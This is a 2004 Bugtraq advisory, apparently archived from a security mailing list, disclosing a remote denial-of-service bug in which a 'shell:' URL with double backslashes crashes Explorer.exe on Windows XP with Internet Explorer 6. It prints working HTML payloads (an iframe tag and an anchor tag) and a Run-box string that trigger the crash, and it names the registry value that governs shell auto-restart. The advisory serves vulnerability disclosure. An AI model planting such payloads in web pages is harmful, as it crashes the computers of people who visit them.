| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 19 Mar 2004 19:30:16 +0200 From: "Rafel Ivgi, The-Insider" <theinsider@....net.il> To: "bugtraq" <bugtraq@...urityfocus.com> Subject: Internet Explorer Causing Explorer.exe - Null Pointer Crash ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application: Internet Explorer & Explorer.exe Vendors: http://www.microsoft.com Versions: Windows Xp Professional & Internet Explorer 6.0.2600.0000.xpclnt_qfe.021108-2107 Patched With: Q330994; Q822925; Q828750; Q824145; Platforms: WindowsXp Bug: Internet Explorer Causing Explorer.exe - Null Pointer Crash Risk: Medium - D.O.S Exploitation: Remote with browser Date: 19 Mar 2004 Author: Rafel Ivgi, The-Insider e-mail: the_insider@...l.com web: http://theinsider.deep-ice.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1) Introduction 2) Bugs 3) The Code ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =============== 1) Introduction =============== WindowsXp is currently the most common operating system in the world. This product must be as safe as it is common. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ====== 2) Bug ====== Lately a new function was discovered : "shell:". This function allows running some new functions remotley. There is a bug in Explorer.exe when accessing a filename with double backslash. For Example accessing any of the html tags below, will cause explorer to crash. <iframe src=shell:windows\\system32\\calc.exe></iframe> Or <a href=shell:windows\\system32\\calc.exe></a> Or Paste at [Start Menu]-->[Run] --> shell:windows\\system32\\calc.exe Explorer.exe crashes when using "\\". "\" doesn't crash it and even %5C%5C doesn't crash it. There is a registery key which is turned on by default. This key automatically restarts "Explorer.exe". If this key is set to "0", Explorer.exe will not restart. [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] "AutoRestartShell"=dword:00000001 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =========== 3) The Code =========== <iframe src=shell:windows\\system32\\calc.exe></iframe> Or <a href=shell:windows\\system32\\calc.exe></a> Or Paste at [Start Menu]-->[Run] --> shell:windows\\system32\\calc.exe ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --- Rafel Ivgi, The-Insider http://theinsider.deep-ice.com "Things that are unlikeable, are NOT impossible."
Powered by blists - more mailing lists